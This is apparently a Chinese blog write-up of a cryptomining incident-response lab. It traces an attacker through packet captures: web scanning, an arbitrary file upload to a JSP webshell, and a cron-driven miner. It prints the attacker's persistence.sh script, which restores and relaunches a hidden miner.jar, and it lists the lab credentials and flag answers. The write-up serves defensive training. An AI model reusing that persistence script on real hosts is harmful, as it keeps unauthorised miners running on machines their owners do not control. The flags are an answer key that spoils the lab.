Featured image of post 某挖矿应急响应靶场WP

某挖矿应急响应靶场WP

某挖矿应急响应靶场WP

靶机介绍

背景:完全仿真了某学校长期未运营维护的程序,被黑客发现了漏洞,但好在学校有全流量设备,抓取到了过程中的流量包,需要你进行上机以及结合流量分析,排查攻击者利用的漏洞以及上传利用成功的木马,以及清除掉攻击者上传的挖矿程序以及后门程序,挖矿环境完全还原了真实环境,但不会出网,比较有意义,清除做了check操作,你只需要按照相关题目引导进行清除,在指定目录下查看flag提交即可,流量包在远程登录成功后/hacker2025.pcap(玄机直接以附件形式下载)

流量中被攻击机IP:192.168.77.32

SSH远程端口:2222 账号密码:root/edusec123

WEB端口为:19999你需要访问和流量进行还原攻击者路径,在注册账号登录成功后,下载首页的应急响应报告模板进行复现描述攻击过程以及加固流程,非常具有学习意义

环境地址:夸克网盘离线安装

[https://pan.quark.cn/s/9fde155741d6](https://pan.quark.cn/s/9fde155741d6()

解题思路

  1. 使用工具分析共有多少IP存在扫描web特征,提交其数量
1
2
//通过scp下载流量包到本地
scp -P 2222 root@192.168.77.32:/hacker2025.pcap ./ 

通过分析流量包受害主机IP为192.168.37.11,并且是Web扫描特征

1
2
3
4
5
6
ip.addr == 192.168.37.11 && http
http.response.code==404

30个左右

(192.168.37.100/192.168.37.103/192.168.37.104/192.168.37.107/192.168.37.108/192.168.37.109/192.168.37.110/192.168.37.111/192.168.37.112/192.168.37.113/114/115/116/117/34/35/36/37/38/39/40/41/42/43/44/10)
  1. 在2025.6.22日17点03分27秒,192.168.37.10,55689端口进行访问的url路径以flag方式进行提交(应急三要素缩小范围)
1
2
3
ip.addr == 192.168.37.10 && tcp.port == 55689

flag{192.168.37.11:8080/servlet/user/uploadAvatar}

  1. 提交存在使用NMAP扫描特征的IP
1
2
3
192.168.37.4

http.user_agent contains "nmap"

  1. 审计流量并结合web站点,攻击者通过什么漏洞进行控制主机,提交漏洞文件名接口
1
2
任意文件上传
/servlet/user/uploadAvatar

  1. 审计流量并结合web站点,攻击者通过哪个用户名利用的漏洞,提交其注册用户名
1
wangyunqing

  1. 审计流量并结合漏洞,提交攻击者控制成功木马文件名
1
2
ip.addr == 192.168.37.11 && http && ip.addr == 192.168.37.10
/uploads/70b86b64-ce15-46bf-8095-4764809e2ee5.jsp

  1. 审计流量并清除掉攻击者上传的木马,清除成功后在/var/flag/1/flag中查看flag并提交
1
flag{1979c46c2af37dc62a4b05881e816995}

  1. 黑客拿到主机权限后,上传了挖矿木马,需要你提交矿池地址

查看计划任务,发现存在可疑任务,查看脚本内容,将miner.jar保存放微步沙箱运行,确认是挖矿程序

1
矿池地址:pool.minexmr.com

  1. 清除掉主机上的挖矿木马,完成后在/var/flag/2/flag文件中查看flag并提交

清除tmp目录下的挖矿程序可获得flag2

1
flag{da236fe0cda81bfc03d022799589110e}
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
oot@1818c9e077a4:/var/lib/tomcat9/webapps/ROOT/uploads# cat /usr/share/.per/persistence.sh
#!/bin/bash

SOURCE_FILE="/usr/share/.miner/miner.jar"
DEST_FILE="/tmp/miner.jar"
PROCESS_NAME="java -jar $DEST_FILE"
LOG_FILE="/var/log/.malware_events.log"


if pgrep -f "$PROCESS_NAME" > /dev/null; then
    
    exit 0
else
    
    echo "[$(date)] Miner process not found. Taking action..." >> "$LOG_FILE"

   
    if [ ! -f "$DEST_FILE" ]; then
        echo "[$(date)] Miner file ($DEST_FILE) is missing. Restoring from backup..." >> "$LOG_FILE"
        
        cp "$SOURCE_FILE" "$DEST_FILE"
        chmod +x "$DEST_FILE"
    fi


    if [ -f "$DEST_FILE" ]; then
        nohup java -jar "$DEST_FILE" > /dev/null 2>&1 &
        echo "[$(date)] Miner process restarted with PID $!." >> "$LOG_FILE"
    else

        echo "[$(date)] CRITICAL: Could not restore miner file from backup. Cannot start." >> "$LOG_FILE"
    fi
  1. 黑客做了后门,即使你清除以后,仍然会定时更新挖矿程序并运行,你找到这个程序,提交其路径
1
2
恶意计划任务脚本文件路径:/usr/share/.per/persistence.sh
挖矿后门路径:/usr/share/.miner/miner.jar
  1. 清除掉后门挖矿程序,在/var/flag/3/flag下查看提交flag
1
flag{27bd067769b51ed71f899c7a6f08af2c}
By Lsec
最后更新于 Jun 24, 2025 15:34 +0800
comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计
¹鵵ҳ